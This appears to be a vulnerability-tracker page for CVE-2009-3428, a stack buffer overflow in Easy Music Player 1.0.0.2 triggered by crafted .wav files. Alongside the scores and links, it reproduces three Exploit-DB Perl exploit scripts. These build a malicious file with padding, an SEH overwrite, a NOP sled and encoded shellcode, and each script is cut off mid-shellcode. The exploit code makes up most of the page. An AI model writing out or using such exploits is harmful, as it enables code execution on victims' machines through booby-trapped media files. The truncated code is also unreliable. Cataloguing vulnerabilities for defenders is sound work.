CVE-2009-3428
published 2009-09-25CVE-2009-3428: Stack-based buffer overflow in Easy Music Player 1.0.0.2 allows remote attackers to execute arbitrary code via a crafted .wav file.
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.07%
92.5th percentile
Stack-based buffer overflow in Easy Music Player 1.0.0.2 allows remote attackers to execute arbitrary code via a crafted .wav file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| otbcode | easy_music_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (3)
exploitdb·2009-08-12
CVE-2009-3428 Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (3)
Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (3)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# first http://www.milw0rm.com/exploits/9412
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
############################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x27\x4a\x01\x10";##lame_enc.dll## unvi
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x
Exploit-DB
Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (1)
exploitdb·2009-08-11
CVE-2009-3428 Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (1)
Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (1)
---
#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
###################################################################
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x
Exploit-DB
Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (2)
exploitdb·2009-08-11
CVE-2009-3428 Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (2)
Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (2)
---
#!/usr/bin/perl
# by ThE g0bL!N
#Big thnx: His0k4
#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH)
##################################################################
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xB8\x15\xC6\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50
No writeups or analysis indexed.
http://secunia.com/advisories/36267http://www.exploit-db.com/exploits/9412http://www.exploit-db.com/exploits/9418http://www.exploit-db.com/exploits/9420http://secunia.com/advisories/36267http://www.exploit-db.com/exploits/9412http://www.exploit-db.com/exploits/9418http://www.exploit-db.com/exploits/9420
2009-09-25
Published